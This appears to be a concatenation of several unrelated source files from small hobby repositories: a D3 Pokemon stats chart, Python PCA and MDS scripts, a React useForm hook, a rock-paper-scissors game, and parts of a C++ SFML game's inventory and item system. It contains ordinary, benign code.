.attr("width", 1000).attr("height", 700)
.attr("id", "svgGen")
.on("click", nextAttr);
$("svg").hide();
d3.csv("../Files/Pokemon.csv", function (data) {
csv = data;
// Default doing Bin: Type and Attr: Attack
$("input[value='Type']").prop('checked', true);
$("input[value='Attack']").click();
$(".filter").fadeIn(1000);
});
}
var getAvgType = function (type, attr) {
var total = 0;
var count = 0;
for (var i = 0; i < csv.length; i++) {
var pokemon = csv[i];
if (pokemon.Type1 != type && pokemon.Type2 != type)
continue;
if (attr == "Male" || attr == "Female") {
total += parseFloat(pokemon[attr]);
}
else {
total += parseInt(pokemon[attr]);
}
count++;
}
return total/count;
};
var getAvgGen = function (gen, attr) {
var total = 0;
var count = 0;
for (var i = 0; i < csv.length; i++) {
var pokemon = csv[i];
if (pokemon.Generation != gen)
continue;
if (attr == "Male" || attr == "Female") {
total += parseFloat(pokemon[attr]);
}
else {
total += parseInt(pokemon[attr]);
}
count++;
}
return total/count;
}
var getHeight = function (key, attr) {
if (isType()) {
var height = getAvgType(key, attr);
}
else if (isGen()) {
var height = getAvgGen(key, attr);
}
if (attr != "Total") {
height *= 5;
}
if (attr == "Male" || attr == "Female") {
height *= 200;
height = Math.round(height);
}
return height;
}
var isType = function () {
return $("input[value='Type']").is(':checked');
}
var isGen = function () {
return $("input[value='Generation']").is(':checked');
}
var getAttr = function () {
return $("#attrForm").val();
}
var show = function () {
var attr = $("#attrForm").val();
var heightArray = [];
if (isType()) {
$("#svgGen").hide();
$("#svgType").fadeIn();
svg = svgType;
for(var i = 0; i < types.length; i++) {
var height = getHeight(types[i], attr);
heightArray.push(height);
}
showType(heightArray);
}
else if (isGen()) {
$("#svgType").hide();
$("#svgGen").fadeIn();
svg = svgGen;
for(var i = 0; i < gens.length; i++) {
var height = getHeight(gens[i], attr);
heightArray.push(height)
}
showGen(heightArray);
}
}
var showType = function(heightArray) {
var bar = $(".Normal");
if (!bar.length) {
svg.selectAll("rect").data(heightArray)
.enter()
.append("rect").attr("width", 45)
.attr("height", function (d) { return d; })
.attr("x", function (d, i) { return i*45 + 10*i + 7; })
.attr("class", function(d, i) { return "bar " + types[i] })
.attr("y", function (d, i) { return svg.attr("height") - d; })
.on("mouseover", zoomBar)
.on("mouseout", shrinkBar);
svg.selectAll("text")
.data(heightArray)
.enter()
.append("text")
.text(getTip)
.attr("x", function (d, i) { return i*45 + 10*i + 7 + 22; })
.attr("y", function (d, i) { return svg.attr("height") - d - 3; })
.attr("text-anchor", "middle").style("opacity", 0)
.attr("class", function(d, i) { return "tip " + types[i]});
}
else {
svg.selectAll("rect").data(heightArray)
.transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d; })
.attr("height", function(d) {return d;});
svg.selectAll("text").data(heightArray).transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d - 3})
.text(getTip);
}
}
var showGen =function(heightArray) {
var bar = $(".gen1");
if (!bar.length) {
svg.selectAll("rect").data(heightArray)
.enter()
.append("rect").attr("width", 157)
.attr("height", function (d) { return d; })
.attr("x", function (d, i) { return i*157 + 10*i + 5; })
.attr("class", function(d, i) { return "bar gen" + gens[i] })
.attr("y", function (d, i) { return svg.attr("height") - d; })
.on("mouseover", zoomBar)
.on("mouseout", shrinkBar);
svg.selectAll("text")
.data(heightArray)
.enter()
.append("text")
.text(getTip)
.attr("x", function (d, i) { return i*157 + 10*i + 7 + 76; })
.attr("y", function (d, i) { return svg.attr("height") - d - 3; })
.attr("text-anchor", "middle").style("opacity", 0)
.attr("class", function(d, i) { return "tip gen" + gens[i]});
}
else {
svg.selectAll("rect").data(heightArray)
.transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d; })
.attr("height", function(d) {return d;});
svg.selectAll("text").data(heightArray).transition().duration(600)
.attr("y", function(d) { return svg.attr("height") - d - 3})
.text(getTip);
}
}
var getTip = function(d, i) {
var label = ((isType()) ? types[i] : "Gen " + gens[i]) + " ";
if (getAttr() == "Total")
return label + Math.round(d);
else if (getAttr() == "Male" || getAttr() == "Female")
return label + Math.round(d) / 1000;
else
return label + Math.round(d) / 5;
}
var nextAttr = function() {
var next = $("input[name='attr']:checked").next();
if (!next.length) {
$("input[value='Attack']").click();
return
}
next.click();
}
var orig = {};
var zooming = false;
var zoomBar = function(d, i) {
if (zooming) return;
zooming = true;
var select;
if (isType()) {
select = "text." + types[i];
}
else if (isGen()) {
select = "text.gen" + gens[i];
}
orig.TipY = d3.select(select).attr("y");
d3.select(select).transition().duration(300)
.style("opacity", 1).attr("y", function() {
return parseInt(d3.select(this).attr("y") - 100);
});
var bar = d3.select(this);
orig.X = parseInt(bar.attr("x"));
orig.Y = parseInt(bar.attr("y"));
orig.W = parseInt(bar.attr("width"));
orig.H = parseInt(bar.attr("height"));
bar.transition().duration(300).attr("x", orig.X - 5)
.attr("width", orig.W + 10)
.attr("height", orig.H + 100).attr("y", bar.attr("y") - 100);
}
var shrinkBar = function (d, i) {
if (isType()) {
d3.select("text." + types[i]).transition().duration(300)
.style("opacity", 0).attr("y", function() { return orig.TipY;});
}
else if (isGen()) {
d3.select("text.gen" + gens[i]).transition().duration(300)
.style("opacity", 0).attr("y", function() { return orig.TipY;});
}
var bar = d3.select(this);
bar.transition().duration(300).attr("x", orig.X).attr("width", orig.W)
.attr("height", orig.H).attr("y", orig.Y);
zooming = false;
}<file_sep>import numpy as np
import pandas as pd
from sklearn import manifold
from sklearn.decomposition import PCA
from sklearn.metrics.pairwise import euclidean_distances
input_file = "correlations.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
X = numpy_array
for y in np.nditer(X, op_flags=['readwrite']):
y[...] = 1 - abs(y)
assert (X.transpose() == X).all()  # the dissimilarity matrix must be symmetric for precomputed MDS
mds = manifold.MDS(n_components=2, dissimilarity='precomputed')
pos = mds.fit(X)
np.savetxt("mdscor.csv", pos.embedding_, delimiter=",")
print(pos.embedding_)<file_sep>import numpy as np
import pandas as pd
input_file = "Pokemon.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
numpy_array = np.rot90(numpy_array, 1)
numpy_array = np.delete(numpy_array, 0, 0)
numpy_array = np.delete(numpy_array, 1, 0)
numpy_array = np.delete(numpy_array, 9, 0)
b = np.corrcoef(numpy_array.astype(float))
print(numpy_array)
#np.savetxt("correlation.csv", b, delimiter=",")<file_sep>import numpy as np
import pandas as pd
from sklearn.decomposition import PCA
input_file = "Pokemon.csv"
df = pd.read_csv(input_file, header=0)
original_headers = list(df.columns.values)
df = df._get_numeric_data()
numpy_array = df.as_matrix()
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 0, 1)
numpy_array = np.delete(numpy_array, 7, 1)
X = numpy_array
#Get PCA Coordinates
pca = PCA()
pca.fit(X)
Xco = np.dot(X, pca.components_[0])
Yco = np.dot(X, pca.components_[1])
pcaPlotCo = np.column_stack((Xco, Yco))
# np.savetxt("pca.csv", pcaPlotCo, delimiter=",")
#Get Data for scree plot
eig = pca.explained_variance_
np.savetxt("eigenvalues.csv", eig, delimiter=",")
print(eig)
|
f42d908c5faba46ea540f9090a7336f2e0db0999
|
[
"JavaScript",
"Python"
] | 8 |
JavaScript
|
brancuad/Pokemon
|
da58c5f1046648bd7442e71ee78a5c3b20780676
|
87f3dae57079881fc9848a4a6c370ebd1cbeb9f9
|
refs/heads/master
|
<file_sep>import React, { useState, FormEvent, ChangeEvent } from 'react'
export interface IUseFormOptions {
initialState?: { [key: string]: any }
onSuccessSubmit: (inputs: { [key: string]: any }) => void
validate: (inputs: { [key: string]: any }) => { [key: string]: any }
}
export default function useForm(opts: IUseFormOptions) {
const { validate } = opts
const [ inputs, setInputs ] = useState(opts.initialState || {})
const [ errors, setErrors ] = useState<any>({})
const [ submitted, setSubmitted ] = useState(false)
const [ pristine, setPristine ] = useState(true)
function dispatchInputs(values: any) {
const newInputs = { ...inputs, ...values }
setInputs(newInputs)
if (pristine) {
setPristine(false)
}
if (submitted) {
setErrors(validate(newInputs))
}
}
return {
dispatchInputs,
errors,
inputs,
pristine,
submitted,
onSubmit(event: FormEvent<HTMLFormElement>) {
event.preventDefault()
setSubmitted(true)
const newErrors = validate(inputs)
setErrors(newErrors)
if (Object.keys(newErrors).length === 0) {
setPristine(true)
opts.onSuccessSubmit(inputs)
}
},
onChange(event: ChangeEvent<HTMLTextAreaElement | HTMLInputElement>) {
dispatchInputs({ [event.target.name]: event.target.value })
},
onChangeRadio(event: React.ChangeEvent<{}>, value: string) {
const target = event.target as HTMLInputElement
dispatchInputs({ [target.name]: value })
},
}
}
<file_sep>React Hook Example: `useForm`
---
This is a demonstration of building your own [React Hook](https://reactjs.org/docs/hooks-intro.html), written in TypeScript.
Some notes about the demonstrated `useForm` hook:
* There are 3 exposed handlers for handling value changes: `onChange` fits the common case for `input` and `textarea` elements, `onChangeRadio` adapts radio-style `(event, value)` callbacks, and `dispatchInputs` is slightly lower-level.
* `pristine` refers to whether the form is untouched. It's the antonym of `dirty`. This is convenient for building a "Do you want to save before leaving?" confirmation feature.
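`onSuccessSubmit` only fires when `validate` returns an empty error object. A minimal sketch of such a validator follows — the field names, error messages, and the commented-out wiring are illustrative, not part of this repo:

```typescript
// A hypothetical `validate` function matching the IUseFormOptions contract:
// it receives the current inputs and returns an object keyed by the invalid
// field names; an empty object means the form may be submitted.
interface Inputs { [key: string]: any }

function validateSignup(inputs: Inputs): Inputs {
  const errors: Inputs = {}
  if (!inputs.email || !String(inputs.email).includes('@')) {
    errors.email = 'A valid email is required'
  }
  if (!inputs.password || String(inputs.password).length < 8) {
    errors.password = 'Password must be at least 8 characters'
  }
  return errors
}

// Inside a component it would be wired up roughly like this:
// const form = useForm({
//   initialState: { email: '', password: '' },
//   validate: validateSignup,
//   onSuccessSubmit: inputs => console.log('submitting', inputs),
// })
// <form onSubmit={form.onSubmit}>
//   <input name="email" value={form.inputs.email} onChange={form.onChange} />
// </form>
```

Because `validate` runs on every change once the form has been submitted, it should stay cheap and side-effect free.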
### License
WTFPL
|
a47abe27b3983d60f421c6ccccb844d33fc94860
|
[
"Markdown",
"TypeScript"
] | 2 |
TypeScript
|
teaualune/react-hook-useform-ts
|
e1de3d48212185a4ca3c1953d50b0296261c8877
|
f36fadd294e70a6768485b0ff436bbe12953474d
|
refs/heads/master
|
<repo_name>gettimer/rockpaperscissors<file_sep>/README.md
# rockpaperscissors
Rock, Paper, Scissors game
### Installation
```
npm install
```
### Start Dev Server
```
npm run start
```
### Build Prod Version
```
npm run dev
```
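### Game Rules

The win/lose rules implemented in `src/index.js` (rock beats scissors, scissors beats paper, paper beats rock) can be sketched as a standalone function — `judge` and `beats` are illustrative names, not identifiers from this repo:

```javascript
// Each option beats exactly one other option.
const beats = { rock: 'scissors', paper: 'rock', scissors: 'paper' };

// Returns 'draw', 'win', or 'fail' from the player's perspective,
// mirroring the branching in src/index.js.
function judge(player, computer) {
  if (player === computer) return 'draw';
  return beats[player] === computer ? 'win' : 'fail';
}

console.log(judge('rock', 'scissors')); // win
console.log(judge('paper', 'scissors')); // fail
```

The first player (user or computer) to win 3 rounds ends the game.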
<file_sep>/src/index.js
import './styles/scss/main.scss';
const options = ['rock','paper','scissors']; //selections
const endTotal = 3; //game finishes when either opponent reaches this score
const resultDiv = document.getElementById('results'); //layer where we print the result
let currentOpt, currentOpp, wins = 0, fails = 0; //user's choice, computer's choice, user's total wins and fails
//creating circle buttons
const addButton = (option) => {
let newOption = document.createElement('li');
let newText = document.createTextNode(option);
newOption.appendChild(newText);
newOption.id = option;
document.getElementById('options').appendChild(newOption);
newOption.onclick = () => {
clearClasses();
if(option !== 'restart') {
//creating rock paper and scissors button click
selectAndBump(option);
}
else {
//creating restart button click
document.getElementById('options').classList.remove('end');
newOption.remove();
printResult(``,'draw');
wins = 0;
fails = 0;
printScore();
}
}
}
//adding rock paper and scissors buttons to dom from options array
const createSelections = () => {
options.forEach(function (option, index) {
addButton(option);
});
}
const selectAndBump = (option) => {
currentOpp = options[Math.floor(Math.random() * options.length)]; //computer's selection, picked at random from the array
currentOpt = option; //user's selection
if(currentOpp === currentOpt) {
draw(option);
}
else {
//if the computer's and user's selections differ, apply the game rules
if(currentOpt === 'rock') {
if(currentOpp === 'scissors') {
win(); //rock eats scissors
}
else {
fail(); //paper eats rock
}
}
else if(currentOpt === 'paper') {
if(currentOpp === 'rock') {
win(); //paper eats rock
}
else {
fail(); //scissors eats paper
}
}
else if(currentOpt === 'scissors') {
if(currentOpp === 'paper') {
win(); //scissors eats paper
}
else {
fail(); //rock eats scissors
}
}
}
}
const draw = (option) => {
printResult(`DRAW! Both you and computer selected ${currentOpt}`,'draw'); //printing draw message
}
const win = () => {
wins = wins + 1; //increasing users win count
printScore(); //printing score
document.getElementById(currentOpt).classList.add('win'); //highlighting winner option
if(wins === endTotal) {
//reached win limit
printResult(`YOU WIN!`,'win');
document.getElementById('options').classList.add('end');
gameOver();
}
else {
//printing win message
printResult(`YOU WIN! You selected ${currentOpt} and computer selected ${currentOpp}`,'win');
}
}
const fail = () => {
fails = fails + 1; //increasing users fail count
printScore();//printing score
document.getElementById(currentOpp).classList.add('fail'); //highlighting computer's winner option
if(fails === endTotal) {
//reached fail limit
printResult(`YOU FAIL!`,'fail');
gameOver();
}
else {
//printing fail message
printResult(`FAIL! You selected ${currentOpt} and computer selected ${currentOpp}`,'fail');
}
}
const clearClasses = () => {
//removing highlights from circle buttons
var selections = document.getElementsByTagName("li");
for (var i = 0; i < selections.length; ++i) {
selections[i].removeAttribute('class');
}
}
const printResult = (str,status) => {
//printing result and adding color class to results div
resultDiv.innerHTML = str;
if(status === 'win') {
resultDiv.classList.remove('fails');
resultDiv.classList.add('wins');
}
else if(status === 'fail') {
resultDiv.classList.remove('wins');
resultDiv.classList.add('fails');
}
else {
resultDiv.classList.remove('fails');
resultDiv.classList.remove('wins');
}
}
const printScore = () => {
document.getElementById('yourwins').innerHTML = wins;
document.getElementById('computerwins').innerHTML = fails;
}
const gameOver = () => {
document.getElementById('options').classList.add('end');
addButton('restart');
}
createSelections();
|
51111721bf6f8709230f9a36297969ca9f336344
|
[
"Markdown",
"JavaScript"
] | 2 |
Markdown
|
gettimer/rockpaperscissors
|
d1b6e3db6593720c52d12ca0847778adad2a7c6a
|
c71cdf17d2ddbf2819862ac6b3770a1f787b32b3
|
refs/heads/master
|
<file_sep>#include "ItemDatabase.h"
#include <fstream>
#include <sstream>
#include <string>
static const char* DB_FILE = "Resources/ItemDatabase/ItemDatabase.txt";
static const char* ITEM_IMAGES_PATH = "Resources/Images/Items/";
ItemDatabase::ItemDatabase() {
std::ifstream infile(DB_FILE);
std::string line, name, desc, imageFilename;
int width, height, maxStack;
int index = 0;
std::istringstream iss;
while (index < DATABASE_SIZE && std::getline(infile, line)) { // stop before overflowing the fixed-size item array
iss.clear();
iss.str(line);
mItemDatabase[index].ID = index;
iss >> name >> width >> height >> maxStack >> imageFilename;
mItemDatabase[index].name = name;
mItemDatabase[index].width = width;
mItemDatabase[index].height = height;
mItemDatabase[index].maxStack = maxStack;
mItemDatabase[index].imageFilename = ITEM_IMAGES_PATH + imageFilename;
std::getline(iss, desc);
mItemDatabase[index].description = desc;
index++;
}
}
ItemDatabase& ItemDatabase::getInstance() {
static ItemDatabase iDB;
return iDB;
}
ItemDatabase::ItemStruct* ItemDatabase::getItemInfo(int index) {
if (index < DATABASE_SIZE)
return &mItemDatabase[index];
return nullptr;
}
ItemDatabase::ItemStruct* ItemDatabase::getItemInfoByName(const std::string & name)
{
for (int i = 0; i < DATABASE_SIZE; i++)
if (mItemDatabase[i].name == name) {
return &mItemDatabase[i];
}
return nullptr;
}
ItemDatabase::~ItemDatabase() {
}
<file_sep>#ifndef _INCLUDED_MOUSECURSOR_H_
#define _INCLUDED_MOUSECURSOR_H_
#include "CollidableEntityDefault.h"
#include "EventObserver.h"
#include "SFML/Graphics/Sprite.hpp"
#include <SFML/Graphics/Texture.hpp>
namespace sf {
class RenderWindow;
}
class EventManager;
class Inventory;
class MouseCursor :public CollidableEntityDefault, public EventObserver {
public:
MouseCursor();
~MouseCursor();
void initalize(EventManager* eventManager, sf::RenderWindow* window);
void finalize();
virtual void tick(const sf::Time & deltaTime) override;
virtual void draw(sf::RenderTarget & target, sf::RenderStates states) const override;
virtual void collide(CollidableEntity * collidable, const sf::Vector2f & moveAway) override;
virtual void observe(const sf::Event & _event) override;
private:
sf::Sprite mSprite;
sf::Texture mTexture;
sf::RenderWindow* mWindow;
EventManager* mEventManager;
};
#endif // !_INCLUDED_MOUSECURSOR_H_
<file_sep>#include "Camera.h"
#include "Player.h"
#include "Constants.h"
#include <SFML/Graphics/View.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
Camera::Camera(sf::RenderWindow* window) :
Entity(UNUSED),
mWindow(window) {
/*sf::View view;
view.setSize(640, 480);
mWindow->setView(view);*/
}
Camera::~Camera() {
}
bool Camera::setup(Entity* player, sf::Vector2f mapBounds) {
if (player == nullptr)
return false;
mPlayer = player;
mBounds = mapBounds;
return true;
}
void Camera::tick(const sf::Time& deltaTime) {
sf::View view = mWindow->getView();
sf::Vector2f playerPos = mPlayer->getPosition();
view.setCenter(playerPos);
float halfWidth = view.getSize().x / 2.0f;
float halfHeight = view.getSize().y / 2.0f;
// Don't let the camera move out of bounds
if (view.getCenter().x < halfWidth)
view.setCenter(halfWidth, view.getCenter().y);
else if (view.getCenter().x > mBounds.x - halfWidth)
view.setCenter(mBounds.x - halfWidth, view.getCenter().y);
if (view.getCenter().y < halfHeight)
view.setCenter(view.getCenter().x, halfHeight);
else if (view.getCenter().y > mBounds.y - halfHeight)
view.setCenter(view.getCenter().x, mBounds.y - halfHeight);
mWindow->setView(view);
}
void Camera::draw(sf::RenderTarget & target, sf::RenderStates states) const {
}
<file_sep>#include "GameManager.h"
#include "EventManager.h"
#include "GameStatePlaying.h"
#include <SFML/System/Clock.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
#include <cstdlib> // srand
#include <ctime>   // time
static const char* TITLE = "Burrowing Deeper";
GameManager::GameManager() :
mClock(),
mWindow(new sf::RenderWindow()), mEventManager(new EventManager())
{
mGameState = new GameStatePlaying(mWindow, mEventManager);
mEventManager->registerObserver(this, std::vector<sf::Event::EventType>{sf::Event::EventType::Closed, sf::Event::EventType::KeyPressed});
}
GameManager::~GameManager() {
mEventManager->unregisterObserver(this, sf::Event::EventType::Closed);
mEventManager->unregisterObserver(this, sf::Event::EventType::KeyPressed);
}
void GameManager::run() {
if (!initalizeGame()) {
printf("Failed to initialize the game.");
exit(-1);
}
gameLoop();
}
void GameManager::observe(const sf::Event & _event) {
switch (_event.type) {
case sf::Event::EventType::Closed:
close();
break;
case sf::Event::EventType::KeyPressed:
if (_event.key.code == sf::Keyboard::Escape) {
close();
}
break;
default:
break;
}
}
bool GameManager::initalizeGame() {
if (!initalizeWindow()) {
printf("Failed to initialize window");
return false;
}
srand((unsigned int)time(NULL));
return true;
}
bool GameManager::initalizeWindow() {
sf::VideoMode video = sf::VideoMode::getDesktopMode();
if (!video.isValid())
return false;
mWindow->create(video, TITLE, sf::Style::Fullscreen);
if (!mWindow->isOpen())
return false;
mWindow->setMouseCursorVisible(false);
mWindow->setVerticalSyncEnabled(false);
return true;
}
void GameManager::close() {
mWindow->close();
}
void GameManager::gameLoop() {
mClock.restart();
mGameState->setup();
while (mWindow->isOpen()) {
mGameState->handleEvents();
mGameState->update(mClock);
mWindow->clear();
mGameState->render();
mWindow->display();
}
}
<file_sep>#pragma once
#include <string>
class ItemDatabase {
public:
struct ItemStruct {
std::string name, imageFilename;
int ID, width, height, maxStack;
std::string description;
};
static ItemDatabase& getInstance();
ItemStruct* getItemInfo(int index);
ItemStruct* getItemInfoByName(const std::string& name);
ItemDatabase(const ItemDatabase&) = delete;
ItemDatabase& operator=(const ItemDatabase&) = delete;
~ItemDatabase();
private:
ItemDatabase();
static const int DATABASE_SIZE = 10;
ItemStruct mItemDatabase[DATABASE_SIZE];
};<file_sep>#include "ItemManager.h"
#include "EventManager.h"
#include "MouseCursor.h"
#include "Item.h"
#include "Inventory.h"
#include "InventorySlot.h"
#include "Constants.h"
ItemManager::ItemManager(EventManager* eventManager) :
mEventManager(eventManager) {
mEventManager->registerObserver(this, sf::Event::MouseButtonPressed);
}
ItemManager::~ItemManager() {
mEventManager->unregisterObserver(this, sf::Event::MouseButtonPressed);
}
bool ItemManager::initialize(MouseCursor* cursor, Inventory* inventory) {
mCursor = cursor;
mInventory = inventory;
// Succeed only if both dependencies were provided
return mCursor != nullptr && mInventory != nullptr;
}
void ItemManager::observe(const sf::Event& _event) {
switch (_event.type) {
case sf::Event::MouseButtonPressed: {
// If inventory is closed, do nothing
float x = mCursor->getPosition().x;
float xmin = mInventory->getPosition().x;
float xmax = mInventory->getWidth() + xmin;
float y = mCursor->getPosition().y;
float ymin = mInventory->getPosition().y;
float ymax = mInventory->getHeight() + ymin;
// Check if the cursor is within the inventory's boundaries
// and also active (open)
if (mInventory->getActive() && x > xmin && x < xmax && y > ymin && y < ymax) {
// Then convert coordinates into inventory slot id
float slotWidth = mInventory->getWidth() / (float)mInventory->getFrameNrX();
float slotHeight = mInventory->getHeight() / (float)mInventory->getFrameNrY();
x = x - xmin;
y = y - ymin;
int slotX = (int)(x / slotWidth);
int slotY = (int)(y / slotHeight);
int slot = slotX + mInventory->getFrameNrX()*slotY;
InventorySlot* invSlot = mInventory->getInventorySlot(slot);
Item* invItem = invSlot->getContent();
// If no item is held and invSlot is an item then
// take item from inventory slot and place on cursor
if (mCursorItem == nullptr && invItem != nullptr) {
mCursorItem = mInventory->takeItemFromSlot(slot, mCursor);
}
// If mouse is holding an item then call for swap
else if (mCursorItem != nullptr) {
mCursorItem = mInventory->swapItems(mCursorItem, slot, mCursor);
}
}
// If the mouse is outside the inventory window and holding an item,
// then drop it into the world
else if (mCursorItem != nullptr) {
// TODO
}
break;
}
default: {
break;
}
}
}
<file_sep>#define _USE_MATH_DEFINES
#include "VectorMath.h"
#include <cmath>
#include <cassert>
float VectorMath::dotProduct(const sf::Vector2f& a, const sf::Vector2f& b) {
return a.x * b.x + a.y * b.y;
}
float VectorMath::getVectorLength(const sf::Vector2f& vector) {
return sqrt(dotProduct(vector, vector));
}
float VectorMath::getVectorLengthSq(const sf::Vector2f& vector) {
return dotProduct(vector, vector);
}
sf::Vector2f VectorMath::projectVector(const sf::Vector2f& aVector, const sf::Vector2f& aProjectOn) {
return (dotProduct(aProjectOn, aVector) / dotProduct(aProjectOn, aProjectOn)) * aProjectOn;
}
sf::Vector2f VectorMath::normalizeVector(const sf::Vector2f& vector) {
if (getVectorLengthSq(vector) == 0) {
return sf::Vector2f(0, 0);
}
if (getVectorLengthSq(vector) == 1) return vector;
float factor = 1.0f / getVectorLength(vector);
return sf::Vector2f(vector.x*factor, vector.y*factor);
}
// Returns the signed angle in radians from v1 to v2.
float VectorMath::getAngle(const sf::Vector2f& v1, const sf::Vector2f& v2) {
return std::atan2(v2.y, v2.x) - std::atan2(v1.y, v1.x);
}
sf::Vector2f VectorMath::getNormal(const sf::Vector2f& aVector) {
return sf::Vector2f(-aVector.y, aVector.x);
}
sf::Vector2f VectorMath::rotateVector(const sf::Vector2f& vector, const float& degrees) {
sf::Vector2f newVector;
float degreesFromRadians = degrees*(float)M_PI / 180.0f;
newVector.x = vector.x* std::cosf(degreesFromRadians) + vector.y*-std::sinf(degreesFromRadians);
newVector.y = vector.x*std::sinf(degreesFromRadians) + vector.y*std::cosf(degreesFromRadians);
return newVector;
}<file_sep>#include "Inventory.h"
#include "EventManager.h"
#include "EntityManager.h"
#include "ResourceManager.h"
#include "InventorySlot.h"
#include "Item.h"
#include <SFML/Graphics/Texture.hpp>
#include <SFML/Graphics/RenderWindow.hpp>
#include <SFML/Window/Event.hpp>
static const char* TEXTURE_FRAME = "Resources/Images/InventoryFrame.png";
static const int ITEM_RENDER_LAYER = 110;
Inventory::Inventory(EventManager* eventManager, EntityManager* entityManager) :
Entity(UNUSED),
mEventManager(eventManager),
mEntityManager(entityManager),
mInventorySlots(), mActive(false), mGarbage(false),
mFrameNrY(0), mFrameNrX(0) {
sf::Color col = { sf::Uint8(155), sf::Uint8(155), sf::Uint8(255), sf::Uint8(200) };
mBackground.setFillColor(col);
mBackground.setOutlineThickness(4.0f);
setPosition(150.0f, 50.0f);
mEventManager->registerObserver(this, sf::Event::EventType::KeyPressed);
}
Inventory::~Inventory() {
mEventManager->unregisterObserver(this, sf::Event::EventType::KeyPressed);
mInventorySlots.clear();
}
void Inventory::setupInventory(int width, int height) {
mFrameNrX = width;
mFrameNrY = height;
sf::Texture* tex = &ResourceManager::getInstance().getTexture(TEXTURE_FRAME);
sf::Vector2f vec = { (float)tex->getSize().x, (float)tex->getSize().y };
sf::Color col = { sf::Uint8(255), sf::Uint8(255), sf::Uint8(255), sf::Uint8(200) };
for (int i = 0; i < mFrameNrY; i++) {
for (int j = 0; j < mFrameNrX; j++) {
sf::Vector2f vec2((float)tex->getSize().x*(float)j,
(float)tex->getSize().y*(float)i);
InventorySlot slot = InventorySlot(j + i*mFrameNrX);
slot.setTexture(TEXTURE_FRAME);
slot.setPosition(vec2 + getPosition());
mInventorySlots.push_back(slot);
}
}
mWidth = vec.x*(float)width;
mHeight = vec.y*(float)height;
sf::Vector2f vec2 = { mWidth, mHeight };
mBackground.setSize(vec2);
}
int Inventory::getFrameNrX() const {
return mFrameNrX;
}
int Inventory::getFrameNrY() const {
return mFrameNrY;
}
float Inventory::getWidth() const {
return mWidth;
}
float Inventory::getHeight() const {
return mHeight;
}
bool Inventory::getActive() const {
return mActive;
}
// Iterate through the entire inventory to try and find an empty space for the item
void Inventory::addItem(Item* item, size_t startpoint) {
for (size_t i = startpoint; i < mInventorySlots.size(); i++) {
if (item == nullptr) return;
item = addItemToSlot(item, i);
}
// There was no room for the item; drop it into the world instead
// TODO
}
// Adds an item to a specific slot in the inventory
Item* Inventory::addItemToSlot(Item* item, int slot) {
// If the slot is out of bounds or there is no item, return immediately
if (slot >= mFrameNrX * mFrameNrY || slot < 0 ||
item == nullptr) return item;
Item* invItem = mInventorySlots[slot].getContent();
int newSlot = getNewSlot(slot, item->getItemInfo()->width, item->getItemInfo()->height);
std::vector<int> indices = getArea(item, newSlot);
bool empty = true;
// If there is an item in any of the slots, return
for (size_t i = 0; i < indices.size(); i++) {
Item* itemToCheck = mInventorySlots[indices.at(i)].getContent();
if (itemToCheck != nullptr) {
return item;
}
}
// If there indeed was an empty space then add the item there
if (empty) {
item->anchorToEntity(&mInventorySlots[newSlot]);
item->setRenderLayer(ITEM_RENDER_LAYER);
for (size_t i = 0; i < indices.size(); i++)
mInventorySlots[indices[i]].setContent(item);
if (item->getItemInfo()->maxStack < item->getStackSize()) {
int newStackSize = item->getStackSize() - item->getItemInfo()->maxStack;
Item* newItem = new Item(item->getItemInfo()->ID, newStackSize);
item->setMaxStack();
mEntityManager->addEntity(newItem);
newItem->setRenderLayer(ITEM_RENDER_LAYER);
return newItem;
}
return nullptr;
}
// If the inventory item has the same ID and is below its
// max stack size then merge the items
else if (invItem != nullptr && invItem->getItemInfo()->ID == item->getItemInfo()->ID &&
invItem->getItemInfo()->maxStack > invItem->getStackSize()) {
// If there are more stacks in total than the max stack, create a new
// instance
if (invItem->getStackSize() + item->getStackSize() > invItem->getItemInfo()->maxStack) {
int newSize = invItem->getStackSize() + item->getStackSize() - invItem->getItemInfo()->maxStack;
invItem->setMaxStack();
Item* newItem = new Item(item->getItemInfo()->ID, newSize);
newItem->setRenderLayer(ITEM_RENDER_LAYER);
mEntityManager->addEntity(newItem);
// The incoming item was fully merged; return the overflow instead
item->kill();
return newItem;
}
invItem->addToStack(item->getStackSize());
item->kill();
return nullptr;
}
return item;
}
// Takes the item from the requested slot, if any, and hands over responsibility
Item* Inventory::takeItemFromSlot(int slot, Entity* anchor) {
if (slot < 0 || slot >= mFrameNrX * mFrameNrY || anchor == nullptr) return nullptr;
Item* invItem = mInventorySlots[slot].getContent();
if (invItem == nullptr) return nullptr;
int newSlot = getNewSlot(invItem->getInventorySlot(), invItem->getItemInfo()->width, invItem->getItemInfo()->height);
invItem->anchorToEntity(anchor);
invItem->setRenderLayer(ITEM_RENDER_LAYER);
std::vector<int> indices = getArea(invItem, newSlot);
for (size_t i = 0; i < indices.size(); i++) {
mInventorySlots[indices[i]].setContent(nullptr);
}
return invItem;
}
Item* Inventory::swapItems(Item* item, int slot, Entity* anchor) {
if (slot >= mFrameNrX * mFrameNrY || slot < 0
|| item == nullptr) return item;
Item* invItem = nullptr;
int newSlot = getNewSlot(slot, item->getItemInfo()->width, item->getItemInfo()->height);
std::vector<int> indices(getArea(item, newSlot));
Item* itemToCheck = mInventorySlots[slot].getContent();
// Check to see if the requested slots have only a single item in them, or are empty
for (size_t i = 0; i < indices.size(); i++) {
invItem = mInventorySlots[indices[i]].getContent();
if (itemToCheck == nullptr && invItem != nullptr)
itemToCheck = invItem;
if (invItem != nullptr && itemToCheck != invItem && itemToCheck != nullptr) {
return item;
}
}
// If all slots were empty, no need to swap
if (itemToCheck == nullptr) {
item->anchorToEntity(&mInventorySlots[newSlot]);
item->setRenderLayer(ITEM_RENDER_LAYER);
for (size_t i = 0; i < indices.size(); i++)
mInventorySlots[indices[i]].setContent(item);
if (item->getItemInfo()->maxStack < item->getStackSize()) {
int newSize = item->getStackSize() - item->getItemInfo()->maxStack;
Item* newItem = new Item(item->getItemInfo()->ID, newSize);
item->setMaxStack();
mEntityManager->addEntity(newItem);
newItem->setRenderLayer(ITEM_RENDER_LAYER);
return newItem;
}
return nullptr;
}
